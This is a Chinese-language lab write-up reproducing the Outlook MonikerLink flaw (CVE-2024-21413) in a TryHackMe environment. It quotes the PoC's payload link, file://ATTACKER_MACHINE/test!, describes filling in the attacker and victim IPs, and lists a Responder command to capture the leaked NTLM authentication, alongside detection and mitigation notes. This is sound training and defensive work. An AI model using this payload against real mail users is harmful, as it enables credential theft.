
该项目在完全隔离的 TryHackMe 环境中复现了 MonikerLink 行为(CVE-2024-21413),展示某些超链接格式如何导致 Outlook 以泄露身份验证尝试或导致进一步利用的方式处理链接。交付成果包括一个 PoC,以及一组安全团队可以应用的优先级缓解措施和检测建议。未针对实时/未授权系统进行攻击。
| 工具/技能 | 用途 |
|---|---|
| Python | 脚本开发 |
| Linux (Kali) | 目标系统 |
| Metasploit | 利用与访问 |
| TryHackMe 实验室 | 受控环境 |
该代码由 CMNatic 编写,可在此处找到
例如,在以下行中:“<a href=“file://ATTACKER_MACHINE/test!” 我将“ATTACKER_MACHINE”替换为攻击机的 IP 地址;在行“server = smtplib.SMTP('MAILSERVER', 25)”中,我将“MAILSERVER”替换为受害机的 IP 地址。
responder -I ens5
systemctl start systemd-resolved

此概念验证揭示了 Microsoft Outlook 链接处理中的一个细微之处:某些引用 SMB 资源的 file:// 样式 moniker 链接可能绕过 Outlook 的标准过滤并触发外部身份验证尝试。此处展示的行为是在完全受控的 TryHackMe 实验室中复现的,强调了看似无害的链接格式如何掩盖网络交互。尽管供应商已发布补丁和检测指南,但由于 moniker/file 方案存在合法用途,底层机制仍然复杂。重要的是,此 PoC 产生的活动在网络层面是可观测的(例如,在显示 NTLM 身份验证尝试的数据包捕获中),因此适合进行取证分析和事件调查。
Florian Roth 已创建了一条 Yara 规则,用于检测包含 :file:\: 元素的邮件。
